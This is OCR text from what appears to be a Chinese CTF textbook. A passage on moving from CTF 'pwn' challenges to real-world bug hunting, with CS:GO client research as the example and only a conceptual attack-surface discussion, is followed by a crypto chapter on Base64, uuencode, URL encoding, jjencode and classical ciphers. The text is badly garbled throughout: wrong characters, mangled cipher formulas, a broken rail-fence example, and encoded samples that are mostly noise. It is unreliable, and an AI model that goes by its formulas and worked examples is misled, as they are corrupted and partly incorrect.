Pavel Yosifovich, Alex lonescu,Mark Russinovich:Windows Internals 


Intel:Intel® 64 and IA-32 Architectures Software Developer's Manual 
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6.10 从 CTF 到 现实 世界 的 PWN 


CTF 从 诞生 至 今 已 有 20 多 年 ， 即 使 是 久 经 沙场 的 “ 老 赛 棍 ”， 也 是 从 做 出 签到 题 的 新 手 开 始 成 长 起 来 
的 。 就 像 电 子 竞 技 选手 最 终 会 退役 一 样 ， 大 部 分 CTF 选 手 也 会 随 着 毕业 工作 ， 无 法 再 分 出 过 多 精力 参 
加 各 种 比赛 而 选择 渐渐 淡出 。 不 再 打 比赛 并 不 意味 着 “ 老 赛 棍 ” 融 放 乔 信息 安全 了 。 人 恰恰 相反 ， 他 们 
转 而 将 现实 世界 作为 一 场 大 型 CTF， 将 真实 的 软件 看 作 目 己 要 挑战 的 题目 ， 去 此 现 真 正 的 漏洞 。 


相 比 于 CTF 题 目 ， 现 实 世界 的 漏洞 挖 所 有 许多 不 一 样 的 地 方 。 初 次 进行 挑战 的 CTF 参 赛 者 往往 很 难 适 
应 。 对 于 接触 了 CTF 并 且 在 PWN 方 向 已 经 有 所 建树 的 参赛 者 来 说 ， 初 次 接触 现实 漏洞 的 挖 所 最 重要 的 
束 是 保持 耐心 。CTF 由 于 赛制 问题 ， 通 弟 一 场 比 赛 的 持续 时 间 在 48 小 时 左右 ， 而 蛙 独 一 追 PWN 题 的 角 
题 时 间 则 更 息 ， 往 往 会 在 24 小 时 内 。 这 器 要 求 选手 快速 找 出 漏洞 ， 并 写 出 利用 的 代码 。 而 面 对 现 实 世 
界 中 那些 庞大 而 复 洒 的 程序 ， 几 天 毫 无 收获 的 研究 会 极 大 消磨 人 的 耐心 ， 让 人 最 终 放 弃 。 要 想 对 付 现 
实 中 这 些 庞 大 复杂 的 程序 ， 需 要 做 好 以 月 甚至 以 年 计算 投入 时 间 的 心理 准备 。 并 且 ，CTF 题 目 是 肯定 
有 解 的 ， 但 真实 软件 并 非 如 此 。 即 使 上 帮 现 的 漏洞 但 是 因为 种 种 原因 无 法 利用 也 是 家 冲 便 饭 。 唯 有 仇 # 
耐心 ， 持 之 以 恒 才 能 有 所 收获 。 


E/NSY: NE: Sm NE: NE AN/N La 
EE :SE /le oN ei 
、 操 作 系 统 的 内 核 、 浏 览 器 、loT 等 都 有 可 能 出 现 ， 每 一 次 的 漏洞 挖掘 都 是 一 次 全 新 的 挑战 。 唯 有 保 
持 不 断 的 学 习 ， 保 持 挑战 未 知 领域 的 勇气 ， 才 不 会 企 漏洞 挖掘 过 程 中 止步 不 前 。 


笔者 之 前 有 做 过 一 段 时 间 的 CS: GO 游戏 的 漏洞 挖掘 ， 这 次 融 借 助 这 个 例子 来 分 享 现 实 中 的 漏洞 挖掘 
与 CTF 的 不 同 之 处 。 


首先 ， 漏 洞 挖掘 过 程 中 更 依赖 信息 收集 。 虽 然 在 CTF 比 赛 中 也 会 收集 各 种 各 样 的 资料 ， 但 是 现实 中 更 
多 的 是 需要 数 天 甚至 几 周 的 时 间 来 学 习 和 了 解 目标 环境 ,使 用 构架 的 相关 知识 。 比 如 在 开始 挖掘 CS: 
GO 的 漏洞 前 ， 先 要 类 道 该 游戏 是 用 起 源 引 擎 制作 的 ， 对 起 源 引 警 要 有 全 面 的 了 解 ， 包 括 : 开发 手册 
供 料 ， 曾 经 出 现 过 的 漏洞 ， 发 布 在 各 种 会 议和 博客 中 的 对 起 源 引擎 的 研究 分 析 资 料 ， 甚 至 一 些 游 戏 儿 
挂 编写 者 对 游戏 逆向 分 析 的 人 资料 等 知识 。 


其 次 ， 攻 击 面 分 析 。CTF 中 的 题目 是 专门 为 了 漏洞 利用 而 编写 的 程序 ， 不 会 有 太 多 多 余 的 代码 ， 而 且 
受 限 于 成 本 ， 代 码 量 与 现实 中 的 软件 是 无 法 相 比 的 。 对 于 CTF 的 PWN 题 目 ， 参 赛 者 一 般 会 从 头 到 尾 分 
析 一 遍 程 序 ， 找 到 漏洞 ， 然 后 开始 利用 脚本 的 编写 工作 。 而 现实 漏洞 挖掘 中 往往 需要 进行 攻击 面 分 

的 工作 。 因 为 现实 中 的 软件 常常 十 分 庞大 ， 而 且 很 多 代码 是 没有 办 法 被 攻击 到 的 。 比 如 ， 软 件 有 些 功 
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能 需要 特殊 的 配置 才能 使 用 ， 一 些 盐 要 认证 才能 使 用 的 网 络 服务 任 个 类 道 用 户 名 密码 情况 下 ， 能 
用 的 功能 十 分 有 限 。 为 此 ， 我 们 需要 进行 攻击 面 分析 ， 找 出 那些 容易 被 攻击 到 的 代码 进行 重点 的 挖 
掘 。 


比如 ，CS: GO 客户 端 游戏 的 攻击 面 大 致 有 3 种 : @ 通 过 架设 恶意 服务 器 与 客户 端 通信 @ 使 用 恶意 大 
客户 端 与 其 他 人 进行 联网 游戏 ， 然 后 通过 语音 或 者 聊天 等 方式 攻击 对 方 客户 端 ，@ 通 过 上 传 恶意 直 
图 、MOD、 插 件 等 供 他 人 下 载 进行 攻击 。 


在 进行 攻击 面 分 析 后 ， 可 以 友 现 需要 关注 的 点 其 实 不 多 。 一 是 网 络 通信 协议 部 分 ， 二 是 客户 端 对 音 
频 、 聊 天 信息 等 的 解析 部 分 ， 三 是 地 图 、MOD 等 数据 的 加 载 解析 部 分 。 这 些 部 分 的 代码 最 容易 被 攻 
击 。 而 诸如 3D 运 算 、 处 理 用 户 输入 等 部 分 的 天 注 优先 级 融会 低 许多 。 


住 做 元 这 些 前 期 准备 工作 后 ， 束 要 开始 耗 时 最 长 的 代码 审计 /六 向 工程 。 由 于 起 源 引擎 在 十 几 年 前 有 过 
一 次 代码 泄露 事故 ， 虽 然 代 码 变化 了 许多 ， 但 是 当初 的 整体 构 以 依然 没 变 ， 因 此 可 以 结合 源码 与 逆向 
分 析 来 更 快 地 进行 漏洞 的 挖 据 。 与 CTF 的 48 小 时 束 结 来 不 同 ， 笔 者 对 CS: GO 的 逆向 和 漏洞 挖掘 持续 
了 一 个 月 左 石 。 


通 剃 ，CTF 中 PWN 的 逆向 时 间 是 小 于 利用 所 消耗 的 时 间 的 。 而 实际 的 漏洞 挖掘 中 逆向 的 时 间 要 远大 

利用 一 个 漏洞 需要 的 时 间 。 而 且 CTF 中 的 题目 是 有 预期 解 的 ， 只 要 顺 着 出 题 人 的 思路 区 能 进行 利用 ， 

实际 的 漏洞 挖掘 中 却 不 存在 预期 的 解法 ， 这 意味 着 存在 无 法 利用 的 漏洞 ， 可 能 是 漏洞 代码 没有 办 法 

默认 配置 下 执行 到 ， 或 者 是 没有 办 法 绕 过 保护 机 制 。 特 别 在 如 今 漏 洞 组 解 撞 施 不 断 更 新 的 环境 下， 年 
个 漏洞 往往 无 法 做 到 利用 。 经 常 需要 结合 数 个 漏洞 才能 实现 远程 代码 执行 ， 也 束 是 0day 攻 击 中 弟 襄 的 
利用 链 。 笔 者 在 CS: GO 代码 中 发 现 了 不 下 10 处 的 漏洞 ， 但 是 至 今 5 法 次 并 条 元 到 的 仁 Wincows | 
环境 中 稳定 远程 攻击 C9: GO 客户 端的 利用 链 。 


与 CTF 漏 洞 利用 的 另 一 个 明显 的 不 同 是 ， 现 实情 况 下 ， 漏 洞 利 用 往往 可 以 参考 其 他 研究 者 的 漏洞 利用 
的 思路 。 因 为 程序 中 往往 会 有 一 些 函 数 、 结 构 体 等 可 以 帮助 攻击 者 进行 漏洞 利用 。 这 时 参考 一 些 之 前 
研究 者 进行 利用 的 实例 会 有 很 大 收获 。 


虽然 实际 的 漏洞 挖掘 与 CTF 有 很 大 的 不 同 ， 但 是 利用 思路 、 基 础 知识 、 逆 向 基本 功 是 不 会 变 的 。 只 要 
稍 加 适应 ， 保 持 耐心 ， 相 信 读 者 也 能 收获 自己 的 0day 漏 洞 。 
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小 结 


笔者 接触 二 进 制 漏洞 正 是 从 CTF 开 始 的 ， 也 像 很 多 人 一 样 经 历 了 从 参加 CTF 到 进行 实际 安全 研究 的 过 


程 。 
1. CTF 与 挖掘 实际 漏洞 的 不 同 
参加 CTF 与 挖掘 实际 漏洞 主要 有 两 点 不 同 : 平台 和 角度 。 


首先 ， 平 台 不 同 ，CTF 中 的 漏洞 题目 主要 以 Linux 下 的 PWN 为 主 ， 昌 然 从 2018 年 开始 陆续 出 现 了 向 现 
实 漏洞 靠拢 的 题目 ， 但 是 Linux 还 是 主 基调 。 笔 者 也 曾 被 问 到 过 ， 为 什么 在 已 经 工作 的 安全 研究 员 
做 Linux PC 安全 研究 的 那么 少 。 其 实 ，Windows 和 Linux 本 身 并 无 高 下 之 分 ， 但 是 安全 研究 工作 需要 
考虑 影响 范围 和 影响 力 的 因素 。 对 于 PC 端 来 说 ， 安 全 研究 人 员 一 般 聚 焦 于 Microsoft、Goodgle、 

、Adobe 等 公司 的 主流 产品 ， 因 为 这 些 产品 用 户 众多 ， 一 旦 出 现 问题 ， 造 成 的 影响 也 更 加 广泛 。 况 
= EE 
能 力 比 掌握 某 些 技巧 更 重要 。 而 且 ， 大 多 数 CTF 参 赛 者 身上 都 具有 这 种 能 力 ， 因 为 CTF 题 目的 考察 点 
是 不 定 的 ， 往 往 需要 参赛 者 快速 地 掌握 完全 没有 接触 过 的 东西 。 因 此 ，Linux 和 Windows 的 平台 差异 
并 不 是 阻碍 CTF 参 赛 者 向 安全 研究 员 转变 的 不 可 逾越 的 鸿沟 


其 次 ， 角 度 不 同 。 实 际 漏洞 利用 有 时 可 能 比 CTF 更 简单 。 因 为 CTF 比 赛 时 间 的 限制 ， 漏 洞 题目 考察 得 
更 多 的 是 漏洞 利用 ， 为 此 出 题 者 往往 会 挖空心思 设计 各 种 限制 并 故意 设计 代码 ， 让 选手 能 通过 各 种 技 
巧 绕 过 这 些 限制 。 而 在 实际 的 二 进 制 漏洞 研究 工作 中 ， 漏 洞 利用 是 整个 研究 过 程 中 时 间 占 比比 较 小 的 
一 部 分 。 一 方面 ， 实 际 的 二 进 制 漏洞 往往 有 毕 通用 的 利用 方式 。 更 主要 的 是 ， 因 为 现实 软件 的 庞大 = 
复杂 ， 需 要 研究 者 投入 大 量 的 时 间 来 进行 代码 分 析 ， 漏 洞 挖掘 。 


CTF 中 其 实 很 少 有 对 漏洞 的 深入 分 析 ， 主 要 原因 是 CTF 中 的 漏洞 都 是 人 为 设计 的 。 而 一 道 CTF 题 目的 代 
码 大 部 分 是 为 了 构造 漏洞 或 者 为 了 能 够 利用 而 服务 的 。 所 以 在 做 PWN 题 的 过 程 中 ， 很 少 出 现 需要 化 很 
长 时 间 分 析 代 码 寻 找 漏 洞 ， 以 及 为 了 能 够 利用 漏洞 分 析 更 多 代码 的 情况 。 


实际 的 漏洞 挖掘 则 不 同 。 为 了 能 够 找到 一 个 漏洞 ， 往 往 需 要 花费 数 天 甚至 数 月 的 功夫 。 但 是 还 没 结 
束 ， 像 堆 洪 出 这 种 漏洞 ， 为 了 搞 清 楚 内 存 结构 并 且 将 内 存 按照 自己 需要 的 情况 进行 排 布 ， 往 往 需 要 
费 与 挖掘 凋 洞 不 相 上 下 的 精力 去 分 析 更 多 的 代码 。 


2 实际 漏洞 研究 


每 个 周期 的 漏洞 披露 一 定 要 跟 进 。 因 为 很 有 可 能 其 中 包含 有 你 所 未 知 的 新 攻击 面 ， 目 研究 漏洞 公告 是 
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最 有 效 的 了 解 同行 的 途径 ， 同 行 们 都 在 挖 哪 方面 的 漏洞 、 哪 方面 容易 出 漏洞 、 哪 方面 不 值得 笛 路 入 进 
去 这 毕 通 过 跟踪 漏洞 公告 都 能 获知 。 


此 外 ， 一 些 重要 的 会 议 议题 、 一 些 业 内 权威 人 士 的 分 享 也 是 值得 关注 的 信息 。 
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第 7 草 Crypto 


除了 Web 和 二 进 制 ，CTF 中 还 有 一 类 重要 的 题目 就 是 Crypto (密码 学 ) 。 密 码 学 是 一 | ] 吝 老 的 学 科 ， 
随 着 人 们 对 信息 保密 性 等 性 质 的 奶 求 而 上 友 展 ， 成 为 了 现代 网 络 空间 安全 的 基础 。 近 年 来 ，CTF 中 密码 
学 题目 的 难度 不 断 增 大 ， 占 比 也 越 来 越 高 。 相 比 于 Web 和 二 进 制 ， 密 码 学 更 考验 参赛 者 的 基础 知识 ， 
对 数学 能 力 、 逻 辑 思 维 能 力 与 分 析 能 力 都 有 很 局 的 要 求 。 


CTF 中 的 密码 学 题目 多 种 多 样 ， 包 括 但 不 限于 : 提供 菏 些 密码 的 大 量 密 文 ， 利 用 统计 学 规律 分 析出 明 
文 ; 或 者 提供 一 个 仔 侍 弱 点 的 目 定义 密码 体制 ， 参 赛 者 需要 分 析出 弱点 并 解 出 明文 ; 或 者 提供 一 个 
企 弱 点 的 加 密 解密 机 的 交互 接口 ， 参 赛 者 需要 利用 密码 体制 的 弱点 来 泄露 某 毕 敏感 信息 等 。 


本 章 由 编码 开始 ， 再 介绍 古典 密码 体制 ， 然 后 介绍 现代 密码 体制 中 最 有 代表 性 也 是 CTF 中 经 党 出 现 的 
分 组 密码 、 流 密码 和 公 钥 密码 体制 ， 最 后 介绍 CTF 中 其 他 常见 的 密码 学 应 用 。 (本 章 部 分 编码 、 密 码 
的 介绍 参考 了 维基 百科 中 相关 词 条 : https://zh.wikipedia.org/。) 


由 于 篇 幅 所 限 ， 本 章 不 可 能 将 所 有 的 密码 体制 原理 面面俱到 ， 而 是 以 介绍 基本 概念 和 解 题 方法 为 主 。 
本 章 需 要 的 先导 知 识 包括 饲 等 数学 、 基 本 的 数论 和 近世 代数 知识 ， 各 读 者 对 此 不 了 解 ， 可 先行 学 习 
“信息 安全 数学 基础 ”。 
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7.1 编码 


7.1.1 编码 的 概念 


编码 (encode) 和 解码 (decode) 是 个 相当 广泛 的 话题 ， 涉 及 计算 机 对 信息 处 理 的 根本 方式 。 最 常 
用 的 编码 是 AsCIl (American Standard Code for Information Interchange， 美 国信 息 交 换 标准 代 
码 ) ， 包 含 国际 通用 的 大 小 与 字母、 数字、 利 见 符号 等 ， 是 互联 网 的 通用 语言 。 


男 一 种 广为人知 的 编码 是 摩 斯 电码 ， 它 是 一 种 时 断 时 续 的 信号 代码 ， 是 一 种 早期 的 数字 化 通信 形式 。 
不 同 于 只 使 用 0 和 1 两 种 状态 的 二 进 制 代码 ， 摩 斯 电码 的 代码 包括 如 下 。 


入 点 (*) : 基本 单位 。 


2 一 为 3 个 氮 的 长 度 。 


站 字母 或 数字 内 ， 操 与 划 之 间 的 间隔 : 2 个 点 的 长 度 。 
NE 
这 种 编码 方式 ( 见 图 7-1-1) 能 把 书面 字符 变 为 信号 ， 大 大 方便 了 有 线 电报 系统 的 通信 。 


一 般 来 说 ， 编 码 的 目的 是 对 原始 信息 进行 一 定 处 理 ， 用 于 更 方便 地 进行 传输 、 和 存储 等 操作 。 但 是 编码 
不 同 于 加 密 ， 并 不 是 为 了 隐藏 信息 ， 也 并 没有 使 用 到 密 钥 等 额外 信息 ， 只 需 知 道 编码 万 式 束 能 得 到 原 


内 容 。 


OO NOUNPBONP 
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WH EE CE 二 
Om mm Ee me 加 到 到 


图 7-1-1 


7.1.2 Base 编 码 

1. Base64 

Base64 是 一 种 基于 64 个 可 打印 字符 来 表示 二 进 制 数据 的 表示 方法 。28=64， 所 以 每 6bit 为 一 个 音 
元 ， 对 应 某 个 可 打印 字符 。3 字 节 有 24bit， 对 应 4 个 Base64 单 元 ， 即 3 字 节 任意 二 进 制 数据 可 由 4 个 日 
打印 字符 来 表示 。 人 在 Base64 中 ， 可 打印 字符 包括 字母 A~ Z、a~ z 和 数字 0 ~ 9， 共 62 个 字符 ， 以 及 


+、/ 字 符 。Base64 单 用 于 只 能 处 理 文 本 数据 的 场合 ， 表 示 、 传 输 、 人 存储 一 些 二 进 制 数据 ， 包 括 MIM 
电子 邮件 、XML 复 杂 数 据 等 。 


转换 时 ，3 字 节 的 数据 先后 放 入 一 个 24 位 的 缓冲 区 中 ， 先 来 的 字 节 占 高 位 ( 见 图 7-1-2， 图 片 来 自 
-base64) 。 数 据 不 足 3 字 节 ， 缓 冲 器 中 剩 下 的 位 用 0 补足 。 每 次 取出 6bit， 按 照 其 值 选择 


ABCDEFGHIJKLMNOPQRSTUVWXYZzabcdefghijklimnopqrstuvwxyz0123456789+/ 


中 的 字符 作为 编码 后 的 输出 ， 直 到 全 部 输入 数据 转换 完成 。 和 大原 数据 长 度 不 是 3 的 倍数 目 剩 下 1 个 输入 
数据 ， 则 在 编码 结果 后 加 2 个 “=”; 右 剩 下 2 个 输入 数据 ， 则 在 编码 结果 后 加 1 个 “=”。 所 以 ,识别 
Base64 编 码 的 一 种 方法 是 看 末尾 是 否 有 “=”。 但 是 这 种 识别 方法 并 不 是 万 能 的 ， 当 编码 的 字符 长 度 
刚好 是 3 的 倍数 时 ， 编 码 后 的 字符 串 末 尾 不 会 出 现 “=”。 


2. Base32 和 Base16 


Base 系 列 中 还 有 Base32 和 Base16， 其 实 Base32/Base16 与 Base64 的 目的 一 样 ， 只 是 具体 的 编码 规 
则 不 同 。 


Base32 编 码 将 二 进 制 文件 转换 成 32 个 ASsCll 字 符 组 成 的 文本 ， 转 换 表 为 


ABCDEFCHIJKLMNOPQRSTUVWXYZ234567 


Base16 编 码 则 将 二 进 制 文件 转换 成 由 16 个 字符 组 成 的 文本 ， 这 16 个 字符 为 0~ 9 和 A~ 上 F， 乓 买 列 征 ， 


编码 。 
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3. uuencode 


uuencode 衍 生 自 “unix-to-unix encoding”， 曾 是 UNIX 系 统 下 将 二 进 制 的 资料 借 由 UUCP 邮 件 系 
统 传输 的 一 个 编码 程式 ， 是 一 种 二 进 制 到 文字 的 编码 。uuencode 将 输入 字符 以 每 3 字 节 为 单位 进行 编 
码 ， 如 此 重复 。 如 果 最 后 剩 下 的 字符 少 于 3 字 节 ， 不 足 部 分 用 0 补 齐 。 与 Base64 一 样 ，uUuencode 将 这 
3 字 节 分 为 4 组 ， 每 组 以 十 进 制 数 表 示 ， 这 时 出 现 的 数字 为 0~ 63 ( 见 图 7-1-3， 图 片 来 目 Wikipedia 
uuencode) 。 此 时 将 每 个 数 加 上 32， 产 生 的 结果 刚好 落 在 ASCII 可 打印 字符 的 范围 内 。 


图 7-1-4 是 经 过 uuencode 编 码 过 后 的 字符 ， 可 以 看 到 uuencode 的 特征 : 特殊 符号 很 多 。 


M16%C:” !G<F]UC” !09B!S:7AT>2!0=71P=70@8VAACF%C=&5R<R H8V]R<F5S 
M<&]N9&EN9R!T;R T-2!I1;G!U=”!B>71E<RD®@:7, @;W5TC 5T (&%S (&$@<V5P 
M87) A=&4@; &EN92!P<F5C961E9” !B>2!1A;B!E;F-09&5D (&-H87) ASW1E<B!G 
M:79I;F<@=&AE(&YU;6)E<B!09B!E;F-09&5D(&) Y=&5S (&]N(" 1H870@;&EN 
M92X@]F ]R (&%L;” !L:6YECR!E>&-EC 0@=&AE (&QA<WOL( 1H:7, @=VEL;” !B 
M92!T:&4@S8VAACF%C=&5R (“=-)R HO5-#24D@8V]D92 W-R ] (#,R*SOU*2X@ 
M268@=&AE (&EN 5T (&ES (&Y0=" !E=F5N;’ D@9&EV: 7—I8FQE (&)Y (#0U+” !T 
M:&4@; &%S=" !L:6YE( =I;&P@8V]N=&%I;B!T:&4@CF5MS6EN: 6YG ($X@; W5T 
M< 5T (&-H87) ASW1E<G, L(" !R96-E9&5D (&)Y( 1H92!C:&%R86-T97 (@=VAO 


4. xxencode 
XXencode 与 Base64 类 似 ， 只 不 过 使 用 的 转换 表 不 同 : 
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklImnopqrstuvwxyz 


只 是 多 了 “-” 字 符 ， 少 了 “/” 字符， 而 且 xxencode 末 尾 使 用 的 补 全 符号 为 “+” ， 不 同 于 Base64 
使 用 的 “=”。 


7.1.3 其 他 编码 
1. URL 编 码 


URL 编 码 又 称 为 百 分 号 编码 。 如 果 一 个 保留 字符 在 特定 上 下 文中 具有 特殊 合 义 ， 且 URI 中 必须 使 用 该 
字符 用 于 其 他 目的 ， 那 么 该 字符 必须 进行 编码 。URL 编 码 一 个 保留 字符 ,需要 先 把 该 字符 的 ASCII 编 
码 表 示 为 两 个 十 六 进 制 的 数字 ， 然 后 在 其 前 面 放置 转 义 字符 “%”， 置 入 URI 中 的 相应 位 置 ( 非 ASCIl 
字符 需要 转换 为 UTF-8 字 节 序 ， 然 后 每 字 节 按照 上 述 方式 表示 ) 。 例 如 ， 如 果 “/” 用 于 URI 的 路 径 成 
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分 的 分 春 待 ， 则 是 具有 特 你 人 台 义 的 傈 留 字 待 。 如 宋 坟 字符 需要 出 现任 URI 一 个 路 径 成 分 的 内 部 ， 则 应 
该 用 “%2F” 或 “%2f ”来 代 蔡 “/ 


2. jencode 和 aaencode 


jjencode 和 aaencode 都 是 针对 JavaScript 代 码 的 编码 方式 。 前 者 是 将 JS 代码 转换 成 只 有 符号 的 字符 
串 ， 后 者 是 将 Js 代码 转换 成 常用 的 网 络 表情 ， 本 质 上 是 对 Js 代码 的 一 种 混淆 。jjencode 和 aaencode 
编码 后 的 效果 见 图 7-1-5 和 图 7-1-6。 


$= []:3[ :++$, 888: (1[]+"™) [C$], $:++$,$.$ :(L[]+，)[3]， 0] i $$ $: (8[$]+"")[$], $$:++$, $58_: (1™"+"") 
[$],$_ :++$,8 8:+$,98_:({]+"")[$], $8.: + 让 2 4.4.(9.4 -$+"")[$.$ Se $=$. A Ss; ( $+"")[$._$])+ 
! 过 : _ 3])+ ($.—= “)[$.$_])+*$.$ [$.$.$]+$._ +$. $+$.8;$.38=$.$+(1"+"") 
[$._3$]+9._ 7$._+$.075.33;8.$:($. mt SI $_];$. $0$. i HY =. $$ +(10]+"")[$. $_]+$ 4 3 计生 思 Ey 4+ 
(YY _ $+$._ $+$.— $88_+(1[]+™)[$. $+(!C]+"")[$. $_]+$. $+",¥¥ +$.$_+$. _+ VY"+$._ $+$._ $+$. $ +9.$$.+° 
¥¥ 地 . Wd 和 3 人 eg es .和 .人 "a _ .$9. BYE, $10 $9. Br YY $8 19+ 
全 


可 ‘on™) 3:0;€ 
ne Lo -0 
Le oe (Ce CA [ro 


7.1.4 编码 小 结 


本 节 介 绍 了 很 多 编码 ， 也 只 是 编码 世界 中 的 冰山 一 角 。 不 过 读者 不 用 担心 ， 现 在 很 少 有 CTF 会 出 现 各 
种 各 样 的 脑 洞 编码 题目 。 一 般 来 说 ，CTF 不 会 专门 考察 选手 对 各 种 编码 的 记忆 能 力 ， 所 以 读者 没有 必 
要 瀛 费时 间 去 记忆 各 种 编码 ， 真 正在 CTF 中 直到 时 ， 直 接 使 用 搜索 引擎 进行 查询 即 可 。 
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7.2 主 典 密码 


古典 密码 是 密码 学 的 一 个 类 型 ， 大 部 分 加 密 方式 是 利用 车 换 式 密码 或 移 项 了 式 密码 ， 有 时 是 两 者 的 混 
合 。 上 古典 密 码 在 历史 上 普 志 被 使 用 ， 但 到 现代 已 经 渐渐 不 弟 用 了 。 一 般 来 说 ， 一 种 古典 密码 体制 包含 
一 个 字母 表 (如 A~Z) ， 以 及 一 个 操作 规则 或 一 种 操作 设备 。 古 典 密码 是 一 类 简单 的 密码 体系 ， 到 了 
现代 密码 时 代 几 乎 不 可 信赖 。 


7.2.1 线性 映射 


1. 凯 撤 密码 

= DA) 
密 的 技术 ， 明 文中 的 所 有 字母 都 在 字母 表 上 向 后 (或 同 前 ) 按照 一 个 固定 数目 进行 偏 移 后 被 芋 换 成 密 
文 。 例 如 ， 当 偏 移 量 是 3 时 ， 所 有 字母 A 将 被 蔡 换 成 D、B 变 成 E， 以 此 类 推 。 这 种 加 密 方 法 是 以 罗马 共 
和 国 时 期 电 撤 的 名 字 命 名 的 ， 当 年 纠 撤 曾 用 此 万 法 与 其 将 军 们 进行 联系 。 


下 面 是 凯撒 密码 的 加 密 和 解密 的 公式 ， 其 中 交待 操作 的 文本 ，/ 为 密 钥 ( 即 偏 移 量 ) : 
EI Te pl 


D,(W=(x-M)) mod26 


UEDEDE :290 7 
使 用 了 某 个 简单 的 蔡 换 加 密 方式 ,但 是 不 确定 是 否 为 纪 撒 密码 时 ， 可 以 通过 使 用 诸如 频率 分 析 或 者 机 
式 单 词 分 析 的 方法 ， 融 能 从 分 析 结 果 中 看 出 规律 ， 确 定 使 用 的 是 否 为 凯 撤 密码 。 


当 我 们 知道 (或 者 猜测 ) 密 文 使 用 了 遍 撤 密码 ， 但 是 不 知道 其 俩 移 量 时 ， 解 决 方法 更 简单 。 由 于 使 用 
引 撤 密码 进行 加 密 的 字符 一 般 是 字母 ， 因 此 密码 中 可 能 是 使 用 的 偏 移 量 也 是 有 限 的 。 例 如 ， 使 用 26 个 
EE 
轻易 地 进行 破解 。 


2. 维 吉 尼 亚 密 码 


维 吉 尼 亚 密码 (Vigenere Cipher) 是 使 用 一 系列 凯撒 密码 组 成 密码 字母 表 的 加 密 算法 ， 属 于 多 表 密 
码 的 简单 形式 。 在 凯撒 密码 中 ， 字 母 表 中 的 每 个 字母 都 有 一 定 的 偏 移 ， 如 偏 移 量 为 3 时 ，A 转 换 为 了 
D、B 转 换 为 了 E; 而 维 吉 尼 亚 密码 由 一 些 偏 移 量 不 同 的 凯撒 密码 组 成 。 
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其 加 密 的 过 程 非 营 简 单 ， 假 设 明 文 为 : ATTACKATDAWN， 密 钥 为 LEMON。 首 先 ， 循 环 密 钥 形成 密 
钥 流 ， 使 之 与 明文 长 度 相同 : 


K= key1 十 key> + key3 十 


即 LEMONLEMONLE; 然后 根据 每 位 秘 钥 对 原文 加 密 ， 如 第 1 位 密 钥 是 /， 对 应 第 12 个 字母 ， 那 么 偏 
移 量 则 为 12-1=11， 对 于 第 1 位 明文 A， 加 密 后 的 密 文 应 为 (A+11) mod26， 即 上 ; 重复 这 个 步骤 ， 
就 可 以 得 到 密 文 LXFOPVEFRNHR。 


= 可 以 寻找 密 文中 相同 的 连续 字符 串 ， 则 密 钥 长 度 一 定 为 
其 间 隅 的 因数 ， 或 者 寻找 “the” “1am ”之 类 的 特殊 单词 。 当 然 ， 现 在 已 经 有 现成 的 工具 可 以 使 用 
(https://atomcated.github.io/Vigenere/) ， 遇 到 维 吉 尼 亚 密码 可 以 直接 使 用 在 线 工 具 求解 。 


7.2.2 固定 苦 换 
1. 培根 密码 


培根 密码 (Bacon's Cipher) 是 由 法 兰 西 斯 :培根 发 明 的 一 种 隐 写 术 ， 加 密 时 ， 明 文中 的 每 个 字母 者 
会 转换 成 一 组 ?个 英文 字母 ， 见 图 7-2-1。 


2 . 猪 圈 密 码 


猪 圈 密 码 (Pigpen Cipher) 是 一 种 以 格子 为 基础 的 简单 蔡 代 式 密码 。 图 7-2-2 是 猪 圈 密码 的 符号 与 
个 字母 的 密码 配对 。 例 如 ， 若 对 明文 “X marks the spot” 进 行 加 密 ， 则 结果 见 图 7-2-3。 


SEE 
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7.2.3 移 位 密码 

1. 栅栏 密码 

A EE EE 
串 。 在 加 密 时 ,假设 明文 为 “wearefamily”， 密 钥 为 “4”， 先 用 密 钥 “4” 将 明文 每 4 个 字符 分 为 


一 组 “wear|lefamllily”， 然 后 依次 取出 每 组 第 1、2、3 个 字母 ， 组 为 “weilleflllaayl|rm”， 再 连接 
起 来 就 可 以 得 到 密 文 “weieflaayrm”.。 


2. 曲 路 密码 
曲 路 密码 的 密 钥 其 实 是 整个 表格 的 列 数 和 曲 路 路 径 ， 设 明文 为 “THISISATESTTEXT”， 先 将 文本 填 


答 阵 ， 见 图 7-2-4; 再 按 预先 约定 的 路 径 ， 从 表格 中 取出 字符 ， 即 可 得 到 密 文 “ 
i ISTXETTSTHISET 
1 Us ”一 Jo 


全 


与 各 种 奇怪 的 编码 一 样 ， 古 典 密 码 也 是 干 奇 百 怪 ， 我 们 不 得 不 佩服 古人 的 智慧 。 然 而 ， 主 流 CTF 一 般 
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不 会 把 某 种 古典 密码 的 加 解密 本 身 作为 一 个 题目 的 核心 考点 ， 如 果 遇 到 了 未 曾 见 过 的 古典 密码 ， 可 以 
参考 文章 《CTF 中 那些 脑 洞 大 开 的 编码 和 加 密 》， 再 结合 搜索 引擎 ， 基 本 能 找到 对 应 的 加 密 、 解 密 
法 . 
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7.3 分 组 密码 


在 密码 学 中 ， 分 组 加 密 (Block Cipher) 又 称 为 分 块 加 密 或 块 密码 ， 是 一 种 对 称 密码 算法 ， 这 类 算法 
将 明文 分 成 多 个 等 长 的 块 (Block) ， 使 用 确定 的 算法 和 对 称 密 钥 对 每 组 分 别 加 密 或 解密 。 分 组 加 密 
是 极其 重要 的 加 密 体制 ， 如 DES 和 AEs 曾 作为 美国 政府 核定 的 标准 加 密 算法 ， 应 用 领域 从 电子 邮件 加 
密 到 银行 交易 转账 ， 非 常 广 泛 。 


本 质 上 ， 块 加 密 可 以 理解 为 一 种 特殊 的 蔡 代 密码 ， 只 不 过 每 次 著 代 的 是 一 大 块 。 因 为 明文 空间 非常 巨 
大 ， 所 以 对 于 不 同 的 密 钥 ， 无 法 制作 一 个 对 应 明 密 文 的 密码 表 ， 只 能 用 特定 的 解密 算法 来 还 原 明文 。 


7.3.1 分 组 密码 单 见 工作 模式 


密码 学 中 ， 分 组 密码 的 工作 模式 允许 使 用 同一 个 分 组 密码 密 钥 对 多 于 一 块 的 数据 进行 加 密 ， 并 保证 其 
安全 性 。 分 组 密码 自身 只 能 加 密 长 度 等 于 密码 分 组 长 度 的 单 块 数据 ， 若 要 加 密 变 长 数据 ， 则 数据 必须 
先 被 划分 为 一 些 单独 的 密码 块 。 通 常 而 言 ， 最 后 一 块 数据 需要 使 用 合适 填充 方式 将 数据 扩展 到 匹配 密 
码 块 大 小 的 长 度 。 分 组 密码 的 工作 模式 描述 了 加 密 每 个 数据 块 的 过 程 ， 并 常常 使 用 基于 一 个 称 为 初始 
